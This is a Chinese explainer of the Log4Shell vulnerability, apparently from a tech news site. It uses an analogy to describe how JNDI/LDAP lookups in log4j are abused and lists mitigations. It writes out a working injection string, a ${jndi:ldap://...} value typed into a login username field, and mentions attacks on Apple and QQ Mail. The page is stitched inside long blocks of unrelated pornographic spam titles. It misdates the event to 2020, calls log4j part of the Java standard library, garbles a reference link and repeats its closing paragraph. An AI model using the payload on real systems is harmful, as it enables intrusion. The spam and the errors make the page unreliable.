精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Log4Shell 漏洞到底是個啥?

安全 漏洞
在 12 月初,爆出了一個核彈級的系統漏洞,導致眾多互聯網公司內部服務器被發現,劫持,甚至植入程序。

 [[441965]]

2020 年的12月,勢必成為各個互聯網公司年度最深刻的記憶。

在 12 月初,爆出了一個核彈級的系統漏洞,導致眾多互聯網公司內部服務器被發現,劫持,甚至植入程序。

盡管目前已經出臺了修復補丁,但這個出現在最基礎的應用最廣泛的模塊 log4j 上的漏洞還是讓我們心有余悸。

為什么這么就沒有被發現,為什么這個漏洞如此嚴重,這個漏洞到底是怎么回事?……

什么樣的漏洞

log4j[1] 是 Java 標準庫的模塊,主要負責記錄各種日志,和 Python 中的 logging[2] 類似。

log4j 功能強大,可以支持各種場景的日志記錄需求,比如將日志輸出到終端,將日志記錄到文件,或者發送到日志服務器等等,可以說但凡需要記錄日志的地方,log4j 是最佳選擇。

正是由于這一點,log4j 才成為最常用的模塊,加上互聯網公司的基礎設施都是由 java 構建的,所以 log4j 深入到每個公司的角角落落。

log4j 就像一個兢兢業業,任勞任怨的門衛老大爺,一絲不茍的記錄著各種來訪信息,以便系統排查問題。

為什么這樣一個普通的,不起眼的模塊會爆出一個驚天漏洞呢?

為了說明這個情況,我借鑒 少數派 PlatyHsu 的比喻[3]做講解,即使你不會編程,不懂技術也可以理解。

門衛

前面我們說 log4j 是一個日志模塊,就像一個門衛老大爺,凡是進入里面的人,都需要在門衛處登記一下。

注意這里的登記不是驗證,只是簡單的記錄一下,比如誰,什么時候,什么目的等等,將這些信息記錄到日志里。

我們經常看到的 Web 系統的訪問日志,就是這個模塊負責產生的。

本來一切正常,但是在一些對性能要求很高的系統中,為了不讓日志記錄占用太多的時間(畢竟,停下來被詢問也是需要時間的),日志模塊里增加了一個事后處理的功能。

也就是說當訪問者很著急時,只要留下一個電話,讓門衛之后去詢問就好了。

這個設計有諸多好處,類似于異步處理,將記錄日志的過程分離出去,異步處理,這樣就不會影響主要流程的執行了。

但是,問題也是出在這里的。

詐騙電話

一些別有用心的人,就利用預留電話的機制,留下了詐騙電話。

當日志處理模塊,事后整理日志時,發現有一行寫了打電話詢問,于是就撥打了留下的電話,然后電話那頭說,恭喜你中獎了,獎品是一部手機,只要提供地址信息就可以免費郵寄過來,等等

這個日志模塊在完全不知情的情況下,就泄露了企業內部的信息,這些信息包括收件人,內部電話等等。

你可能會奇怪,為什么需要日志模塊撥打電話呢?到底是怎么撥打的電話,這里稍作展開一下。

日志模塊不是真的去撥打電話,而是日志記錄的機制中允許使用模板。

就像 Python 里的字符串模板一樣,在合成字符串時,可以用占位符代替實際內容,根據實際情況做出填充例如:

  1. strTemp = "Hello {name}" 
  2.  
  3. print(strTemp.format(name'Lily')) 
  4.  
  5. # 結果為:Hello Lily 

log4j 為了靈活,使用一個叫 JNDI[4](Java Naming and Directory Interface)的目錄查詢方法,這個方法可以支持 LDAP[5](輕型目錄訪問協議,Lightweight Directory Access Protocol)協議,對網絡上的輕型目標進行查詢。

LDAP 的格式為:

ldap://ldap.example.com/cn=John%20Appleseed

意思是向 ldap.example.com 發送一個請求,查詢名為 John Appleseed 這個人的信息。

重點來了:

LDAP 協議是可以進行網絡訪問的

到這里我們就會發現,當處理日志的程序,執行到需要替換日志模板的語句時,恰巧有時需要通過 LDAP 協議獲取信息的情況下,就會去訪問這個地址。

如果別有用心者,將這個地址作為一個陷阱,或者作為一個木馬程序的下載地址,就可以在服務器毫不知情的情況下,在暴漏服務器內部信息,甚至下載木馬程序到服務器上。

之前的很多報道已經指出,黑客利用這個漏洞,在服務器上安裝了挖礦程序。

如何實施

對于普通大眾來說,系統漏洞離我們很遠,即使知道這樣的漏洞存在,也不知如何發揮作用,也是因為這個原因,導致很多人對漏洞信息不敏感,以為自己不知道如何使用,別人也就不知道,這樣的想法會讓自己常常處于危險之中。

log4Shell 漏洞,實施起來簡單地讓人難以置信,甚至不需要使用什么攻擊工具,只需要在平臺的登錄頁面,填寫一個特別的用戶名即可。

例如在蘋果網站上,將用戶名寫成類似這樣的 ${jndi:ldap://ldap.example.com/a} 形式:

蘋果

當然 ldap 網站需要自己設置或者使用一個可以提供記錄訪問者信息的服務,就能看到蘋果內部的服務器信息了。

這里還有對 QQ 郵箱的攻擊示例:

QQ郵箱

只要在能訪問系統的地方,加上特殊的注入語句,就可以實施攻擊了,所以對漏洞的攻擊,并沒有想象中那么復雜,因此在發現漏洞時,要及時打補丁做補救,而不能因為自己不知如何實施而放之不管。

如何消除

當我們了解了整個過程,對于如何防止就很清晰了,如果這個漏洞沒有被及時修復,也可以采取一些措施防止信息泄露。

最容易想到的是防止系統對不了解的外網進行訪問。

就像給內部電話限制撥打長途一樣,對于超出范圍的呼叫做出限制。

第二可以通過參數設置禁止系統的中的 JNDI 通信協議,就是讓日志模塊中的 JNDI 失效。

還有就是下載補丁,修補漏洞。

給我們的啟示

漏洞修補很容易,但是造成這個漏洞的根源卻難以消除。

我們總是在易用性和安全性之間找到一個平衡點,而增加易用性和功能性的同時,會引入更多的不確定性,特別是當依賴層級加大,大量的間接依賴會使問題的復雜程度超出我們的想象。

log4Shell 因為其巨大的破壞性,一經發現,就被及時處理了,但可能還存在這樣那樣的依賴導致的問題,繼續存在。

因此我們在做系統擴展功能的時候,要特別注意因為依賴而導致的系統問題,很多時候命名覺得無關緊要的邊緣的功能,卻成了漏洞躲藏的絕佳場所。

總結

沒有一個純凈的環境,完美的世界,log4Shell 漏洞讓我更清楚地看到這個世界的真實 —— 漏洞無處不在!

我們能做的就是要提供防護意識,像預防新冠病毒一樣做好防護,不迷信,不謠傳,也不大意和忽視。

可能我們平時寫的代碼效用有限,如果沒有防護和安全意識,就像裸奔一樣。

幾年前筆者在 github 上發布一段代碼示例時,誤將實際環境的配置信息上傳了上去,過來一周左右,意識到問題時,服務器已經被人注入了挖礦程序!

很難想象一個默默無聞的更新會被人注意且利用了,所以防護意識是我們暢游于網絡的護身符。

比心!

很難想象一個默默無聞的更新會被人注意且利用了,所以防護意識是我們暢游于網絡的護身符。

比心!

參考資料

[1]log4j: https://logging.apache.org/log4j/2.x/

[2]logging: https://docs.python.org/zh-cn/3/library/logging.html

[3]少數派 PlatyHsu 的比喻: https://sspai.com/post/70394

[4]JNDI: https://baike.baidu.com/item/JNDI/3792442

[5]LDAP:https://baike.baidu.com/item/%E8%BD%BB%E5%9E%8B%E7%9B%AE%E5%BD%95%E8%AE%BF%E9%97%AE%E5%8D%8F%E8%AE%AEDFDFDFDFDFDFDFDFDFDFDFDFDFDFDFDFT56666666666666666666

 

責任編輯:武曉燕 來源: Python技術
相關推薦

2022-01-07 10:02:31

Log4j漏洞網絡攻擊網絡安全

2021-12-15 06:21:29

Log4Shell漏洞網絡攻擊

2022-01-06 11:55:02

Aquatic PanLog4Shell漏洞

2025-10-31 00:00:02

硅光光通信英偉達

2021-12-17 09:50:21

Log4Shell漏洞勒索軟件

2022-01-14 19:12:07

勒索軟件攻擊漏洞

2022-01-10 09:30:33

Java漏洞漏洞網絡攻擊

2025-10-29 07:33:13

2024-02-07 12:35:00

React并發模式concurrent

2022-01-28 12:07:29

Log4j漏洞網絡攻擊

2021-12-14 16:07:04

Log4Shell漏洞黑客

2022-05-04 08:38:32

Netty網絡框架

2021-05-11 07:30:58

JNIJavaAPI

2021-01-28 17:41:32

Github網站Pull Reques

2022-04-10 19:26:07

TypeScript類型語法

2021-12-22 09:54:48

黑客Log4Shell漏洞攻擊

2022-01-10 11:16:40

漏洞 Log4j2Jndi

2024-05-15 16:10:15

2024-07-12 15:08:23

Python@wraps函數

2024-08-26 14:23:56

點贊
收藏

51CTO技術棧公眾號

北条麻妃国产九九精品视频| 日韩免费电影在线观看| 国产精品国产三级国产aⅴ无密码 国产精品国产三级国产aⅴ原创 | 性欧美videosex高清少妇| 国产午夜精品久久久久| 蜜臀久久99精品久久一区二区| 色呦呦日韩精品| 相泽南亚洲一区二区在线播放 | 国产精品一二三在线| 久久精品亚洲a| 免费一级欧美片在线观看网站| 一区二区三区在线播放| 精品久久久久久中文字幕动漫| 最新中文字幕一区| 欧洲福利电影| 日韩欧美黄色影院| 91视频最新入口| av网站在线免费观看| 激情文学综合插| 性色av香蕉一区二区| 精品欧美一区二区久久久| 色999韩欧美国产综合俺来也| 一区二区免费在线| 蜜桃网站成人| 国产日产亚洲系列最新| 西西人体一区二区| 久久电影一区二区| v天堂中文在线| 精品裸体bbb| 亚洲综合在线视频| 色婷婷精品国产一区二区三区| 国产视频www| 噜噜噜久久亚洲精品国产品小说| xxxxx成人.com| 日本免费福利视频| 欧美一区一区| 在线观看不卡视频| 日本国产在线播放| 成人免费网址| 国产婷婷色一区二区三区| 99在线免费观看视频| 日批视频免费观看| 亚洲深夜福利| 欧美激情在线观看| 伊人久久久久久久久久久久久久| 九九视频免费观看视频精品| 日韩欧美美女一区二区三区| 日韩av卡一卡二| 一个人看的www视频在线免费观看 一个人www视频在线免费观看 | 亚洲第一激情av| 日韩最新中文字幕| 成人资源www网在线最新版| 成人激情av网| 97免费资源站| 国产精品久久久久毛片| 丝袜美腿亚洲综合| 91国在线精品国内播放 | 亚洲电影一级黄| 操bbb操bbb| 欧美三级黄网| 亚洲国产高清在线| 视频一区二区在线观看| 日韩亚洲视频在线观看| av在线播放不卡| 国产精品10p综合二区| 99国产在线播放| 精品一区免费av| 91精品国产自产在线老师啪| 亚洲天堂手机在线| 美腿丝袜一区二区三区| 国产精品美女主播在线观看纯欲| 区一区二在线观看| 久久精品人人做人人爽电影蜜月| 久操成人在线视频| 欧美成人一二三区| 91精品国产福利在线观看麻豆| 中文字幕国产亚洲2019| 波多野结衣一二三四区| 欧美亚洲精品在线| 夜夜嗨av一区二区三区四区| 一道本在线观看| 国内精品久久久久久久影视简单 | 国外成人在线视频| 国产精品二区一区二区aⅴ| 午夜久久影院| 欧美精品18videosex性欧美| 日本熟女一区二区| 综合天堂久久久久久久| 欧美福利在线观看| 懂色av.com| 亚洲一区二区免费看| 538国产精品一区二区免费视频 | 91福利国产成人精品照片| 91国产精品视频在线观看| 成人免费网站www网站高清| 欧美日韩一卡二卡| 色婷婷一区二区三区在线观看| 婷婷视频一区二区三区| 亚洲精品国产成人| 无码人妻精品一区二区中文| 欧美hd在线| 欧美裸体男粗大视频在线观看| 精品午夜福利视频| 亚洲精品孕妇| 国产精品久久一区| 99国产精品欲| 久久午夜免费电影| 2021国产视频| 国产三级电影在线播放| 日本高清无吗v一区| 日韩一级免费片| av动漫精品一区二区| 亚洲开心激情网| 国产精品久久久久久成人| 永久91嫩草亚洲精品人人| 久久影视电视剧免费网站清宫辞电视| 欧美日韩在线观看成人| 免费在线亚洲| 亚洲精品日韩av| 欧美女子与性| 亚洲精品免费电影| 美女日批免费视频| 亚洲欧美在线综合| 亚洲精品自拍视频| 久久精品波多野结衣| 久久一二三区| 国产日韩精品推荐| 五月天婷婷在线视频| 婷婷综合久久一区二区三区| 污视频网址在线观看| 91免费精品国偷自产在线在线| 亚洲欧美福利视频| 久久午夜鲁丝片午夜精品| 免费高清在线视频一区·| 国产一级精品aaaaa看| 黄在线免费观看| 色噜噜狠狠色综合中国| 影音先锋资源av| 66视频精品| 国产成人av在线播放| 囯产精品久久久久久| 国产精品国产三级国产普通话蜜臀| 91丨porny丨探花| 日日夜夜综合| 最近2019中文字幕mv免费看| 97免费在线观看视频| 国产超碰在线一区| 中文字幕欧美人与畜| 日本在线影院| 精品国精品自拍自在线| 日本黄色小说视频| 久久99精品久久久| 日韩精品久久一区| 日韩pacopacomama| 日韩黄在线观看| 欧美亚韩一区二区三区| 国产高清在线精品| 糖心vlog在线免费观看| 在线成人av观看| 亚洲成人久久久久| 538精品在线视频| 精品中文字幕一区二区小辣椒| 日本一区二区三区免费看| 超碰国产一区| 亚洲欧美国产日韩天堂区| 中文字幕亚洲高清| av在线不卡观看免费观看| 欧美中日韩在线| 黄页免费欧美| 日韩亚洲成人av在线| 亚洲影视一区二区| 中文字幕一区二区三区视频| 成年人三级黄色片| 激情综合网五月| 国产精品久久97| 国产精品影院在线| 欧美日韩精品一区二区三区蜜桃 | 每日在线更新av| 亚洲成人一品| 国产精品久久久久久超碰| 91官网在线| 91精品国产一区二区三区蜜臀| 国产suv一区二区三区| 国产成a人亚洲| 激情深爱综合网| 视频一区中文| 国产欧美一区二区三区久久人妖 | 逼特逼视频在线| 欧美调教在线| 国产精品九九久久久久久久| 欧美午夜电影一区二区三区| 日韩精品一区国产麻豆| 韩国av免费观看| 亚洲国产精品激情在线观看 | 九九久久精品视频| 激情视频小说图片| 欧美a一欧美| 国产精品久久久久久久久久久不卡| 欧美性videos| 91精品免费观看| 久久狠狠高潮亚洲精品| www.亚洲精品| 日本新janpanese乱熟| 91视频综合| 国产日产精品一区二区三区四区| 国产精品扒开腿做爽爽爽视频软件| 色偷偷偷亚洲综合网另类| www.天堂av.com| 欧美性猛交xxxx黑人猛交| 少妇太紧太爽又黄又硬又爽小说| 国产毛片精品国产一区二区三区| 亚洲美免无码中文字幕在线| 天天躁日日躁成人字幕aⅴ| 国产在线播放不卡| 狠狠躁少妇一区二区三区| 亚洲国产精品视频在线观看| 亚洲无码久久久久久久| 婷婷久久综合九色综合绿巨人 | 欧美日韩国产成人| 日本黄在线观看| 欧美一级片免费看| 四虎成人在线观看| 亚洲婷婷在线视频| 久久精品国产亚洲av久| 国产一区二区三区在线观看免费| av免费观看网| 一级欧洲+日本+国产| 欧洲精品久久| 草草视频在线一区二区| 日本一区二区三区四区视频| 性欧美ⅴideo另类hd| 色偷偷av一区二区三区乱| 日本人妖在线| 日韩欧美一区二区视频| 中文字幕在线2018| 欧美性猛交xxxx免费看| 久久久www成人免费毛片| 中文av一区二区| 黄色正能量网站| 高清久久久久久| 日韩av加勒比| 另类的小说在线视频另类成人小视频在线 | 999av视频| 欧美色综合影院| 亚洲自拍一区在线观看| 午夜精品久久久久影视| 可以免费看av的网址| 国产欧美一区视频| 国产交换配乱淫视频免费| 成人av在线电影| 国产一线在线观看| 高清国产一区二区| 肉色超薄丝袜脚交| 国产美女在线观看一区| 亚洲午夜精品一区| 麻豆freexxxx性91精品| 手机在线成人免费视频| 久久亚洲精选| 国产精品拍拍拍| 免费精品视频在线| 日韩av在线综合| 日韩精品一二三区| 在线观看av日韩| 秋霞综合在线视频| 国产欧美一区二区三区不卡高清| 牛牛影视久久网| 欧美日韩无遮挡| 91欧美国产| 国产成人生活片| 国产欧美不卡| 黄色aaa级片| 国产成人精品影视| 亚洲国产果冻传媒av在线观看| 国产午夜精品理论片a级大结局 | 午夜精品一区在线观看| 日本视频免费观看| 9191成人精品久久| 色婷婷在线视频| 亚洲天堂av在线播放| 超碰在线最新| 91高清视频免费观看| 久久69成人| 国产精品一区二区你懂得| 深爱激情久久| 97超碰国产精品| 视频精品一区二区| 两女双腿交缠激烈磨豆腐| 91在线视频18| 国产亚洲精品久久久久久豆腐| 亚洲国产精品一区二区www在线 | 日韩精品中文字幕在线不卡尤物| 五月婷婷六月色| www.亚洲一区| 1234区中文字幕在线观看| 国产在线观看91精品一区| 久久久久97| 天天成人综合网| 视频一区免费在线观看| 丰满熟女人妻一区二区三区| 国产欧美日韩三区| 伊人365影院| 欧美另类变人与禽xxxxx| 亚洲欧美日韩成人在线| 久久久99免费视频| 免费观看欧美大片| 99精品99久久久久久宅男| 成人高清电影网站| 香港三级韩国三级日本三级| 国产一区二区调教| 成人在线手机视频| 岛国av一区二区在线在线观看| 国产免费黄色片| 中文字幕一精品亚洲无线一区| 黄色在线免费观看网站| av一区和二区| 欧美高清视频手机在在线| 激情婷婷综合网| 91性感美女视频| www.av视频在线观看| 欧美一区二区在线视频| 搞黄视频在线观看| 日本精品在线视频| 日本午夜精品| 妞干网在线观看视频| 国产精品夜夜嗨| 久久福利免费视频| 欧美日韩一区视频| 大胆av不用播放器在线播放| 热久久这里只有| 亚洲+小说+欧美+激情+另类 | 亚洲天堂电影| 精品麻豆av| 亚洲国产激情| 日本精品一二三| 一区二区三区日韩| 亚洲成人一级片| 欧美裸体男粗大视频在线观看| 成人短视频软件网站大全app| 亚洲免费久久| 久久精品国产一区二区| 亚洲女人毛茸茸高潮| 欧美图片一区二区三区| 97超碰人人在线| 国产美女主播一区| 色135综合网| aaa一级黄色片| 最新国产の精品合集bt伙计| 91亚洲精品国偷拍自产在线观看| 日韩亚洲成人av在线| 成人在线视频www| 裸体裸乳免费看| 国产成人在线视频网站| 久久国产露脸精品国产| 亚洲国产成人久久综合一区| 水蜜桃在线视频| 日韩欧美一区二区在线观看| 日韩国产在线观看| 亚洲图片第一页| 日韩视频在线一区二区| 丁香花在线电影| 美女三级99| 日本午夜一本久久久综合| 国产一二三四视频| 91麻豆精品国产91久久久使用方法 | 欧美国产日韩一区二区在线观看| 日韩欧美高清一区二区三区| a级免费在线观看| 91亚洲永久精品| 亚洲中文一区二区| 久久天天躁狠狠躁夜夜躁| 五月亚洲婷婷| 国产97在线 | 亚洲| 欧美国产精品一区二区| 国产普通话bbwbbwbbw| 91爱视频在线| 日本高清免费电影一区| 国产精品91av| 在线一区二区三区做爰视频网站| 青青青青在线| 精品国产一区二区三区四区精华 | 欧美日韩在线亚洲一区蜜芽| 国产在线1区| 久精品国产欧美| 麻豆国产精品777777在线| 18精品爽视频在线观看| 亚洲天堂日韩电影| 中文在线综合| 老熟妇仑乱视频一区二区| 一区二区在线观看视频在线观看| 熟妇人妻中文av无码| 国产精品一区专区欧美日韩| 欧美日本精品| 美女av免费看| 亚洲国产成人在线播放| 日韩护士脚交太爽了| 成熟丰满熟妇高潮xxxxx视频| 国产精品盗摄一区二区三区| 欧洲成人一区二区三区| 国产一区视频在线播放| 久久久久久穴|